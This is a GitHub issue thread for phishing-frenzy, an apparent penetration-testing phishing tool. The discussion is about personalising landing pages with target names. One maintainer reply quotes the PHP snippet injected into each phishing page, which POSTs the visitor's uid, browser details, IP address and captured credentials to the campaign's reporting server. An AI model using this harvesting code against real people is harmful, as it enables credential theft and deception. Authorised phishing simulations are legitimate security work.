phishing-frenzy icon indicating copy to clipboard operation
phishing-frenzy copied to clipboard

Published 20 hours ago verified publisher icon pentestgeek

Feature Request: Possibility to use firstname, lastname as dynamic fields in php pages

Open RESP-hub opened this issue 8 years ago • 6 comments

When designing email templates you can use dynamic tags like this: <%= @target.firstname %> <%= @target.lastname %> <%= @target.email_address %>

These dynamic tags don't work anymore in the php landing pages that the user visits. Questions:

  1. What would be the best or easiest option to also get these uploaded user values available on each PHP page linked offcourse with the correct user/UID. So for example, when a user with UID=123456 visits we can display a php page with text that includes his name. Can we not get these user variables loaded in the php session?
  2. Is it possible to extends the user upload fields with 1-3 additional info fields?

RESP-hub avatar May 09 '16 11:05 RESP-hub

The easiest way, at present, is to modify https://github.com/pentestgeek/phishing-frenzy/blob/master/app/controllers/reports_controller.rb#L71 so the finish string contains those values. Then do something in PHP to parse the string and place it in the rest of the document.

Meatballs1 avatar May 09 '16 12:05 Meatballs1

That value will be found in the PHP header injected in the top of each file, https://github.com/pentestgeek/phishing-frenzy/blob/e6d13c25e16bab8dd4a5bc987c248258cf4b9891/app/views/reports/tags.txt.erb:

$result = file_get_contents($url, false, $context);

You are probably best off editing the files directly in the public/deployed/campaign_id folder rather than via templates at that stage.

Meatballs1 avatar May 09 '16 12:05 Meatballs1

Thanks for your fast answer; I have studied it, but have some questions. It is not clear for me how I can pickup this "finish" string. By default I doesn't seem that it is already present in the HTTP headers. So is it correct to say that I can add some php code in each PHP-template page that prints-out the full $results variable? I prefer to do in in the templates.

RESP-hub avatar May 11 '16 12:05 RESP-hub

The finish string will be retrieved in the PHP snippet injected into every page.

39 $url = "<%= GlobalSettings.first.site_url %>" . '/reports/results/'; 
40 $data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds); 
41 

42 // use key 'http' even if you send the request to https://... 
43 $options = array( 
44     'http' => array( 
45     'header'  => 'Content-type: application/x-www-form-urlencoded', 
46     'method'  => 'POST', 
47     'content' => http_build_query($data), 
48     ), 
49 ); 
50 $context  = stream_context_create($options); 
51 $result = file_get_contents($url, false, $context);

$result should equal the contents finish string

Meatballs1 avatar May 11 '16 20:05 Meatballs1

You could probably put in PHP tags somewhere in the page to show this: <?php echo $result; ?>

Meatballs1 avatar May 11 '16 20:05 Meatballs1

thanks; just one more: is the 'results' string used for anything? if i add other data as you suggest will it not messup something else?

RESP-hub avatar May 13 '16 15:05 RESP-hub